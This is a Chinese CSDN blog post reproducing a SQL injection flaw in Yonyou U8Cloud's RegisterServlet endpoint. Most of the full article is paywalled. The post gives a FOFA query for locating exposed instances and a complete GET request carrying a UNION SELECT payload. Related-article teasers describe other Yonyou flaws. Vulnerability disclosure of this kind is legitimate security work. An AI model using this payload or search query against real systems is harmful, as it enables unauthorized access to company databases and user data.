【漏洞复现】用友U8Cloud nc.bs.sm.login2.RegisterServlet SQL注入漏洞

最新推荐文章于 2025-05-09 16:22:39 发布

从不学安全

最新推荐文章于 2025-05-09 16:22:39 发布

阅读量291

点赞数 1

分类专栏：漏洞复现文章标签： sql oracle 数据库

本文链接：https://blog.csdn.net/qq_67810151/article/details/137118925

版权

漏洞复现专栏收录该内容

99 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案

0x02 漏洞概述

用友U8Cloud nc.bs.sm.login2.RegisterServlet接口处存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄露。

0x03 测绘语句

fofa: body="开启U8 cloud云端之旅"

0x04 漏洞复现

GET /servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27)),NULL,NULL,NULL,NULL-- HTTP/1.1

Host：xxxx

X-Forwarded-For: 127.0.0.1

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞（含批量验证poc）

weixin_43567873的博客

03-29

128

用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞

【漏洞复现】用友NC Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入

失心少年

03-31

161

漏洞链接：http://127.0.0.1/servlet/~uap/nc.bs.sm.login2.RegisterServlet?技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习，禁止用于其他！用友NC Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入漏洞。

参与评论您还未登录，请先登录后发表或查看评论

用友u8-cloud RegisterServlet SQL注入漏洞复现

fly夏天的博客

12-25

1837

用友U8 cloud是用友推出的企业上云数字化平台，该产品RegisterServlet接口处存在SQL注入漏洞，攻击者可通过该漏洞获取数据库权限。文章复现了该漏洞并提供了进一步利用的相关方案。并提供了官方的修复方案。

【攻防演练】【含poc和修复建议】用友NC及 U8cloud LoggingconfigServet 接口反序列化漏洞

zzxx191z的博客

07-26

353

使用防护类设备进行防护,限制访问 nc.bs.logging.config.LoggingConfigServlet 路。使用 ysoserial 生成序列化数据。径，拦截请求中出现的恶意序列化数据。如非必要，避免将资产暴露在互联网。

【漏洞复现】用友-U8C-反序列化-ClientRequestDispatch

知黑而守白

04-19

304

用友U8Cloud是用友网络科技股份有限公司（简称“用友网络”）推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能，包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式，适用于不同行业和企业规模的需求，帮助企业实现数字化转型和云端化管理。用友U8C ClientRequestDispatch接口存在反序列化漏洞，使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令，严重威胁系统的机密性和完整性。

用友U8 Cloud uapbd.refdef.query SQL注入漏洞复现

0xSec

11-01

465

用友U8 Cloud uapbd.refdef.query 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

【漏洞复现】用友U8 Cloud XChangeServlet XXE漏洞复现

m0_71944965的博客

12-30

205

用友U8 cloud /servicelXChangeServlet接口存在XXE漏洞，未授权的攻击者可通过此漏洞获取数据库敏感信息，从而盗取服务器数据造成服务器信息泄露。

用友U8 Cloud 反序列化RCE漏洞复现

0xSec

11-08

5016

用友U8Cloud存在多处（FileManageServlet和LoginVideoServlet）反序列化漏洞，系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作，结合系统本身存在的反序列化利用链，最终造成远程代码执行。

Yonyou U8Cloud 3.6 二次开发环境搭建及自定义API开发测试

Wind的专栏

06-23

4475

U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

qq_42067124的博客

12-28

784

U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

【U9Cloud】OpenApi接口对接记录

LLmoe的博客

01-19

8373

客户升级ERP 从U8升级到U9C,由之前的U8数据库对接更换U9C 的OpenApi对接，中间踩了不少坑，网上的资料比较少，这里做个记录分享喜。

用友U8接口-接口配置&Token访问令牌(2)

243927103的博客

01-27

1966

介绍获取token方式和调用生单时的参数

【SQLSERVER】Ubuntu 连接远程 SQL Server（MSSQL）

linjiuxiansheng的博客

05-08

404

在 Ubuntu 上连接 SQL Server 使用 sqlcmd 是最简单高效的方法。本文详细介绍了如何配置和连接，同时解决了常见问题。希望本文对你的跨平台数据库连接有所帮助。

Android数据库全栈开发实战：Room+SQLCipher+Hilt企业级应用构建

全栈

05-07

1293

本文全面讲解了Android数据库开发的最新技术，包括Room框架的使用、SQLCipher数据库加密、Hilt依赖注入以及Firebase前后端数据同步。通过一个加密任务管理应用的实战案例，展示了如何构建安全、高效且可维护的企业级数据库系统。文章涵盖了数据库基础配置、加密实现、性能优化、架构设计和质量保障等关键环节，为企业级Android应用开发提供了完整的技术参考。

postgresql-15 更改默认存储路径

weixin_38924998的博客

05-06

232

线上生产环境 pg-15默认存储路径是 /var/lib/pgsql/ ，在实际使用中这个目录下会写满根目录。需要更改一下存储目录。根目录磁盘使用率95%。开始更改存储目录。

解决SQL Server SQL语句性能问题（9）——正确使用索引